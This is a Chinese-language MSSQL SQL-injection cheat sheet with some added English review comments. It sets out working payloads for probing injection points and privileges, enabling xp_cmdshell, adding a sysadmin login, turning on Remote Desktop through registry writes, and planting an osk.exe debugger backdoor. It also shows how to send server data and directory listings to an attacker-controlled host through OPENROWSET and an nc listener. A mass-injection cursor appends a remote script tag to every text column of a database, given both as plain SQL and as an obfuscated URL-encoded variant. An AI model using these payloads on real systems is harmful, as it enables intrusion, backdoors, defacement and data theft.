//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --

数字类型
and char(124)%2Buser%2Bchar(124)=0

字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

爆用户名
 and user>0
' and user>0 and ''='

检测是否为SA权限
or convert(int, system_user)=1--
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

检测是不是MSSQL数据库
and exists (select * from sysobjects);-- 

检测是否支持多行
;declare @d int;-- 

select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') 

停掉或激活某个服务。 
-- Stop / start a Windows service by its short name through xp_servicecontrol (sysadmin).
-- 'schedule' is the Task Scheduler service name.
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'

xp_terminate_process
停掉某个执行中的程序,但赋予的参数是 Process ID。
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
xp_terminate_process 2484

xp_unpackcab
解开压缩档。
xp_unpackcab 'c:\test.cab','c:\temp',1

更改sa口令方法:用sql综合利用工具连接后,执行命令:
exec sp_password NULL,'新密码','sa'

-----------------------------
cmd加sql帐户
-----------------------------
REM Build a two-line SQL script and run it with isql: creates login 'jack' and makes it sysadmin.
REM NOTE(review): the redirects write test.qry into the current directory but isql reads c:\test.qry,
REM so this only lines up when run from C:\. -E (trusted connection) together with /U /P is
REM contradictory; the trusted connection is the point — it authenticates as the interactive user.
echo exec master.dbo.sp_addlogin 'jack','jack' >test.qry 
echo exec sp_addsrvrolemember 'jack','sysadmin' >>test.qry 
cmd.exe /c isql -E /U alma /P /i c:\test.qry 

mssql更新及查询语句

select * from  db_name  where tablename='x140m1n6'
从db_name表中寻找出tablename是 x140m1n6的信息数据

UPDATE db_name SET monery = '10.00' WHERE UserName = 'x140m1n6'
修改数据库db_name,设置Username为x140m1n6的money项为10.

查询
select * from dnt_users where uid=577

插马
-- Template for rewriting one column of one row via a stacked query ('+' is a URL-encoded space):
;update+表名+set+字段名=插马地址+where+id=(要插马的id)--
例子
-- Example. The hex is the GBK-encoded headline "每日经济新闻:百思买放缓中国拓展脚步" plus CRLF,
-- i.e. a harmless title rewrite used to demonstrate the technique (presumably a varchar column
-- under a Chinese collation). A hex literal is used so the URL contains no quotes; the bare
-- 'where id=1115' limits the change to one row.
http://www.xxx.com/xxx.asp?id=2122;update+law+set+title=0xC3BFC8D5BEADBCC3D0C2CEC5A3BAB0D9CBBCC2F2B7C5BBBAD6D0B9FACDD8D5B9BDC5B2BD0D0A+where+id=1115--

sql2005存储添加
-- SQL Server 2005+: the three server options this page relies on. Each needs ALTER SETTINGS
-- (sysadmin/serveradmin) and each toggle is written to the ERRORLOG as a
-- "Configuration option '...' changed" message — the thing for a defender to alert on.
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

-- OLE Automation: needed for every sp_OACreate / sp_OAMethod example on this page.
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;

-- Ad Hoc Distributed Queries: needed for OPENROWSET / OPENDATASOURCE with a connection string.
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;

------------------------------------------
sql开 3389 

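-- Enable Terminal Services on Windows 2000 through registry writes (the 2003+ switch is
-- fDenyTSConnections, near the end of this page), then reboot. All need sysadmin.
-- @r carries the hive name so that 'HKEY_LOCAL_MACHINE' never appears literally, presumably
-- to dodge a filter; the first line of the original lacked the declare and began with a stray quote.
-- Offline Files (netcache) off — on 2000 it conflicts with Terminal Services.
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_regwrite @r,'software\microsoft\windows\currentversion\netcache','enable','reg_sz','0';----
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_regwrite @r,'software\microsoft\windows nt\currentversion\winlogon','shutdownwithoutlogon','reg_sz','0';----
-- Windows Installer policy allowing installs in remote sessions.
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_regwrite @r,'software\policies\microsoft\windows\installer','enableadmintsremote','reg_dword',1;----
-- TSEnabled=1 turns the feature on; Start=2 sets the TermDD driver and TermService to automatic start.
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_regwrite @r,'system\currentcontrolset\control\terminal server','Tsenabled','reg_dword',1;----
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_regwrite @r,'system\currentcontrolset\services\termdd','start','reg_dword',2;----
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_regwrite @r,'system\currentcontrolset\services\termservice','start','reg_dword',2;----
-- Keyboard-layout hotkey for the .DEFAULT profile (the logon desktop); @r is unused on this line.
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_regwrite 'hkey_users','.default\keyboard layout\toggle','hotkey','reg_sz','1';----
-- 'iisreset /reboot' restarts the whole machine, not just IIS. Requires xp_cmdshell.
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_cmdshell 'iisreset /reboot';----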

-------------------------------------------

在db权限并且分离获取mssql数据库服务器ip的方法 

1.本地nc监听   nc -vvlp 80 

2.;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=xxx;Network=DBMSSOCN;Address=你的ip,80;', 'select * from dest_table') select * from src_table;-- 
其他的都不用管

去掉tenlnet的ntlm认证 
;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'—

public权限列目录 

提起public权限的用户估计很多人也觉得郁闷了吧~N久以前看了一篇《论在mssql中public和db_owner权限下拿到webshell或是系统权限》的文章(名字真长-_-!!!),里面说到没办法利用xp_regread,xp_dirtree…这些存储过程,原因是public没有办法建表,我在这里矫正一下其实public是可以建表的~呵呵,使这些存储过程能利用上,看下面的代码吧 

--建立一个临时表,一般的表我们是无办法建立的,我们只能建立临时表 

-- Directory listing with only 'public': a global temporary table (##) can be created by any
-- login even when permanent tables cannot, and INSERT ... EXECUTE captures xp_dirtree's
-- output (two columns at depth 1 without the file flag: subdirectory, depth).
create table ##nonamed( 

       dir ntext, 

       num int 

) 

-- Run the extended procedure and store its result set in the temp table.

insert ##nonamed execute master..xp_dirtree 'c:\',1 

-- Push the temp table's contents to a SQL Server the attacker controls via OPENROWSET.
-- The connection leaves from the database server with the credentials given inline.

insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select * from Northwind.dbo.dirtree') 

select * from ##nonamed 

以上方法,也就是说public可以遍历用户服务器的目录

dtproperties这个表默认是public可写的,提示够清楚了吧
手工列目录语句
-- Directory listing into a permanent table for a login that may create one: xp_dirtree with
-- depth 1 and file flag 1 returns three columns (subdirectory, depth, file), hence the table shape.
-- NOTE: "C:\" in double quotes is a string only when QUOTED_IDENTIFIER is OFF; most drivers set
-- it ON, in which case it is parsed as an identifier and the call fails — use 'C:\' there.
';DROP TABLE D99_Tmp;CREATE TABLE D99_Tmp(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100))  Insert D99_Tmp exec master..xp_dirtree "C:\", 1,1--

-- Error-based probe: '|' + count + '|' cannot convert to int, so the error message echoes the
-- row count of D99_Tmp. The same pattern is then used to read the rows out.
' And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0  and ''='

2005恢复 xp_cmdshell

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

2005恢复 sp_oacreate

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;

清理掉SQL日志(注意:下面的 DUMP TRANSACTION / BACKUP LOG ... WITH NO_LOG / DBCC SHRINKDATABASE 只是截断、收缩事务日志,属于 DBA 日常维护操作;它们不会清除 SQL Server 错误日志、默认跟踪或 Windows 事件日志,对登录、配置变更等审计记录没有任何影响。另外 WITH NO_LOG / TRUNCATE_ONLY 自 SQL Server 2008 起已被移除。)
-- NOTE(review): truncated on the page — only the declarations of a well-known transaction-log
-- shrink script survive; its body is not here. Like the commands that follow, it acts on the
-- transaction log, not on the error log or Windows event logs.
set nocount on 
declare @logicalfilename sysname,
@maxminutes int,
@newsize int

mssql清除日志

DUMP TRANSACTION 数据库名 WITH NO_LOG 

对mssql事务日志变大的处理 清空日志 
DUMP TRANSACTION 数据库名 WITH NO_LOG

截断事务日志 
BACKUP LOG 数据库名 WITH NO_LOG

收缩数据库 
DBCC SHRINKDATABASE(数据库名) 

mssql导出数据库表
本机
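-- Export a table with bcp through xp_cmdshell (sysadmin).
-- Local instance: -T is a trusted connection as the service account; -c character mode; -t,
-- makes the comma the field terminator. The .xls extension is cosmetic — the output is CSV text.
exec master..xp_cmdshell 'bcp ikoreaDB..member out d:\tt.xls -c -t, -T'

-- Remote instance: explicit server, login and password. The password is visible in the process
-- command line and in any xp_cmdshell audit while bcp runs. (Original had the typo "Databse".)
exec master..xp_cmdshell 'bcp Database..table out d:\tt.txt -c -t , -Sservername -Uuser -Ppassword'
-- servername: the SQL Server instance name; user / password: the login used to connect.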

映像劫持ii
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\Currentversion\Image File Execution Options\osk.exe','debugger','REG_sz','g:\web\rootsite\djsite\uploadfile\nt.exe on';-- 

SQL开3389命令2007-05-19 12:22把一次从SQL开3389的记录过程发出来,望对新手有用

注://为注释
实例过程:
连接到主机:

xxx.xxx.xxx.xxx //大家可以用sql连接器连上有空口令的sql肉机
命令:

xp_cmdshell "type c:\boot.ini" // 输入命令,看系统,server版的才能 开3389
执行成功,

结果:
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect

命令:

xp_cmdshell "echo [Components] > c:\hack" //在c盘根目录建写入一个文件,文件名hack大家可以自己改为自己的
执行成功,

命令:

xp_cmdshell "echo TsEnable = on >> c:\hack" //追加写入
执行成功,

结果:

命令:

xp_cmdshell "type c:\hack" //看看hack里的内容是否正确
执行成功,

结果:
[Components] 
TsEnable = on 
TsEnable = on

命令:

xp_cmdshell "sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\hack /q" //开3389,成功的话过会肉机会重启!!
执行成功,

结果:
GetLocalManagedApplications returned (2)

数据库挂马
针对ASP+mssql攻击测试代码:
-- Mass "SQL injection worm" pattern (ASP + MSSQL, circa 2008): walks every user table and
-- appends a script tag to every text/varchar column. Kept as a reference for what to detect
-- and recover from; the cursor over sysobjects/syscolumns is the signature to look for.
declare @t varchar(255),
@c varchar(255) 
-- xtype 'u' = user tables; column xtype 99 / 35 / 231 / 167 = ntext / text / nvarchar / varchar.
declare table_cursor cursor for 
select a.name,b.name 
from sysobjects a,
syscolumns b 
where a.id=b.id and 
a.xtype='u' and 
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 
open table_cursor 
fetch next from table_cursor into @t,@c 
while(@@fetch_status=0) 
begin 
-- convert(varchar, ...) without a length truncates existing values to 30 characters, so this
-- destroys data as it infects. cast(... as varchar(80)) also caps the payload: the hex decodes
-- to the 95-byte tag shown in clear text below the block, so the stored tag comes out cut off.
exec('update ['+@t+'] set ['+@c+']=
rtrim(convert(varchar,['+@c+']))+cast(0x223E3C2F613E3C2F7469746C653E3C736372697074206C616E67756167653D6A617661736372697074207372633D687474703A2F2F2533352533312536462536362532452536452536352537342F696D672E6769663E3C2F7363726970743E as varchar(80))') 
fetch next from table_cursor into @t,@c 
end 
close table_cursor 
deallocate table_cursor

"></a></title><script language=javascript src=http://%35%31%6F%66%2E%6E%65%74/img.gif></script>

;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F613E3C2F7469746C653E3C696672616D65207372633D687474703A2F2F7777772E676F6F676C652E636F6D2077696474683D313030206865696768743D3130303E3C2F696672616D653E20%20aS%20vArChAr(80))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;--

创建sp_makewebtask这个存储过程

/********************************************************************************************/  
/* Create SP's                                                                              */  
/********************************************************************************************/  

--====================================================================================  
-- Add extended stored procedures for Web Server support.  
--  
-- sp_makewebtask: Creates and defines the Web Page Task  

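--====================================================================================
-- sp_makewebtask: T-SQL wrapper that validates its arguments and hands off to the
-- extended procedure xp_makewebtask (xpweb70.dll), which writes a query result as an
-- HTML page. On this page it is used to write arbitrary files (.hta/.asp) to disk.
--
-- Review notes:
--  * The wrapper is useless on its own: it only works while xp_makewebtask is registered
--    (sp_addextendedproc xp_makewebtask, 'xpweb70.dll'). The Web Assistant procedures
--    were removed in SQL Server 2005; recreating the wrapper does not bring them back.
--  * It refuses non-sysadmin callers (error 15003 below), so this is a sysadmin-only path.
--  * "CREATE PROCEDURE sys.sp_makewebtask" is the system-procedure form; a normal
--    connection is not allowed to create objects in the sys schema, so use dbo in master
--    if you actually recreate it.
--  * The two [url=...]@charset[/url] fragments in the original listing were forum markup
--    and have been restored to @charset.
--====================================================================================
CREATE PROCEDURE sys.sp_makewebtask
@outputfile  nvarchar(255),
@query   ntext,
@fixedfont  tinyint = 1,    -- 0/1
@bold   tinyint = 0,    -- 0/1
@italic   tinyint = 0,    -- 0/1
@colheaders  tinyint = 1,    -- 0/1
@lastupdated tinyint = 1,    -- 0/1
@HTMLheader  tinyint = 1,    -- 1-6
@username  nvarchar(128) = NULL,
@dbname   nvarchar(128) = NULL,
@templatefile nvarchar(255) = NULL,
@webpagetitle nvarchar(255) = NULL,
@resultstitle nvarchar(255) = NULL,
@URL   nvarchar(255) = NULL,
@reftext  nvarchar(255) = NULL,
@table_urls  tinyint = 0,    -- 0/1; 1=use table of URLs
@url_query  nvarchar(255) = NULL,
@whentype  tinyint = 1,    -- 1=now, 2=later, 3=every xday
           -- 4=every n units of time
@targetdate  int = 0,     -- yyyymmdd as int
@targettime  int = 0,     -- hhnnss as int
@dayflags  tinyint = 1,    -- powers of 2 for days of week
@numunits  tinyint = 1,
@unittype  tinyint = 1,    -- 1=hours, 2=days, 3=weeks, 4=minutes
@procname  nvarchar(128) = NULL,  -- name to use when making the
           -- task and the wrapper/condenser
           -- stored procs
@maketask  int = 2,     -- 0=create unencrypted sproc, no task
           -- 1=encrypted sproc and task
           -- 2=unencrypted sproc and task
@rowcnt   int = 0,     -- max no of rows to display
@tabborder  tinyint = 1,    -- borders around the results table
@singlerow  tinyint = 0,    -- Single row per page
@blobfmt  ntext = NULL,    -- Formatting for text and image fields
@nrowsperpage int = 0,     -- Results displayed in multiple pages of n rows per page
@datachg  ntext = NULL,    -- Table and column names for a trigger
@charset  nvarchar(25) = N'utf-8', -- Universal character set is the default
@codepage  int = 65001     -- utf-8 (universal) code page is the default

AS
BEGIN

   DECLARE @suid smallint
   DECLARE @yearchar nvarchar(4)
   DECLARE @monthchar nvarchar(2)
   DECLARE @daychar nvarchar(2)
   DECLARE @hourchar nvarchar(2)
   DECLARE @minchar nvarchar(2)
   DECLARE @secchar nvarchar(2)
   DECLARE @currdate datetime
   DECLARE  @retval int

-- Check for valid @dbname if supplied (error 16854, return 9)
   IF (@dbname is NOT NULL)
      IF (NOT(exists(SELECT * FROM master..sysdatabases WHERE name = @dbname)))
      BEGIN
   RAISERROR(16854,11,1)
         RETURN (9)
      END

-- Make sure that it's a sysadmin executing this (error 15003, return 1).
   IF ( NOT ( is_srvrolemember('sysadmin') = 1 ) )
   BEGIN
      RAISERROR( 15003, -1, -1, 'sysadmin' )
      RETURN(1)
   END

-- If not supplied, determine the user executing this procedure; Windows logins
-- (containing '\'), sa and an unknown name all map to dbo.
   IF (@username is NULL)
   BEGIN
       SET @username = suser_sname()

       IF ( (charindex ('\',@username) > 0) OR (@username is NULL) OR (@username = 'sa') )
       BEGIN
           SELECT @username = N'dbo'
       END
   END

-- If not supplied, determine the database currently active for this spid
   IF (@dbname is NULL)
   BEGIN
   SELECT @dbname = d.name FROM
    master..sysdatabases d, master..sysprocesses p
    WHERE d.dbid = p.dbid AND spid = @@spid

   END

-- Generate @procname if not supplied: 'web_' + yyyymmddhhmmss + spid + 4 random digits
   IF (@procname is NULL)
      BEGIN

         SET @currdate = getdate()

   SET @yearchar = convert(nvarchar(4),year(@currdate))
         SET @monthchar = right('0'+ rtrim(convert(nvarchar(2),month(@currdate))),2)
         SET @daychar = right('0'+rtrim(convert(nvarchar(2),day(@currdate))),2)
         SET @hourchar = right('0'+rtrim(convert(nvarchar(2),datepart(hh,@currdate))),2)
         SET @minchar = right('0'+rtrim(convert(nvarchar(2),datepart(mi,@currdate))),2)
         SET @secchar = right('0'+rtrim(convert(nvarchar(2),datepart(ss,@currdate))),2)

   -- Get default procname if not supplied
         SET @procname = N'web_'+convert(nchar(14),@yearchar+@monthchar+@daychar+@hourchar+@minchar+@secchar)+convert(nvarchar(20),@@spid)+right(rtrim(convert( VARCHAR(25),RAND() )),4)

      END

   SET @retval = 0

-- Create the Web task; the extended procedure does the actual file write.
   EXECUTE @retval = sys.xp_makewebtask  @outputfile, @query, @username, @procname, @dbname,
     @fixedfont, @bold, @italic, @colheaders, @lastupdated, @HTMLheader,
     @templatefile, @webpagetitle, @resultstitle, @URL, @reftext,
     @table_urls, @url_query, @whentype, @targetdate, @targettime,
     @dayflags, @numunits, @unittype, @rowcnt, @maketask, @tabborder,
     @singlerow, @blobfmt, @nrowsperpage, @datachg, @charset, @codepage

-- Surface a non-zero result from xp_makewebtask as an error attributed to it.
 IF (@retval <> 0)
 BEGIN
     SET @procname = 'xp_makewebtask'
     RAISERROR(@retval, 11, 1, @procname)
 END

   RETURN @retval

END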

其实opendatasource是取数据用的,如果你想得到数据库的IP,根本不需要MSSQL环境就可以得到DATA的IP

用如下语句:
insert into OPENROWSET('SQLOLEDB','uid=test;pwd=test;Network=DBMSSOCN;Address=219.152.120.157,555;', 'select * from dest_table') select * from src_table;--

然后在本机用 NC 监听连接串 Address 里写的那个端口就可以了(上例是 555;原文写的 8787 与示例不一致)。这个连接是数据库服务器主动发起的,所以 nc 看到的来源地址就是数据库服务器对外的出口 IP,而不是 Web 服务器的。

另外,用opendatasource取数据的时候要考虑本机带宽等问题!

利用OPENROWSET这个函数也可以拿到数据 并不单单拿到data的IP

关于利用注射点判断数据库web是否分离2009-04-25 13:11来自:皇子  

   xp/2003系统下注册表里有个键值可以得到真实的ip地址
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\{FBD72F8D-6334-4739-957A-7D324D9C27EF}\Parameters\Tcpip
,在注册表的窗口右边就可发现“IPAddress”、“DefaultGateway”、“SubnetMask”等键值,它们分别对应本机当前配置的IP地址、网关及子网掩码等信息
我们用opendatasource反弹出来的ip始终都是公网ip
即使得到的数据库ip和webip一样   也不能断定数据库web不分离
我可以先建立一个表,把注册表里的真实ip写进去,然后如果是个公网ip而且和反弹结果一样 则断定是数据库web不分离 如果是个内网ip 则观望状态。
具体代码:
-- Find the real NIC configuration via the registry (to tell whether web and DB share a host).
-- 1. Enumerate the service keys into a pre-existing table 'ku' (not created here) to find the
--    adapter GUID; it differs per machine (the prose above shows a different one), which is why
--    it is enumerated rather than hard-coded. Per the note below, this call and xp_regenumvalues
--    need sysadmin.
insert ku exec master..xp_instance_regenumkeys 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\' 
把网卡id写进表ku 中,然后用各种手法读出来,
-- 2. List the values under that adapter's Tcpip parameters.
exec master..xp_regenumvalues 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\{4733C3BB-EC77-4AB4-A6EA-02DB07FD7CFD}\Parameters\Tcpip'                  
看看tcpip项下有几个小项

-- 3. Read IPAddress / DefaultGateway. xp_regread is the one call here that is not sysadmin-only.
exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\{4733C3BB-EC77-4AB4-A6EA-02DB07FD7CFD}\Parameters\Tcpip','ipaddress'

exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\{4733C3BB-EC77-4AB4-A6EA-02DB07FD7CFD}\Parameters\Tcpip','DefaultGateway'
然后读出每个属性,就知道ip网关了

但是实际操作的时候其实有很多问题,除了xp_regread,上面2个存储过程都是要求sa来调用的,这下还不如直接直接命令然后看结果来的方便简单了,不过难得研究出来了就放这吧,有点鸡肋了.
幸好200(sql2005_inj的作者)给予了一个方案,可以更简洁:
select host_name();得到客户端主机名
select @@servername;得到服务端主机名 
暴错时 and host_name()>0--
不暴时配合union all select
或者全部opdatasource反弹回来,查看结果一样就是不分离,不一样的话就是分离 

开启3389的SQL语句: 
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;-- 

关闭3389的SQL语句: 
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;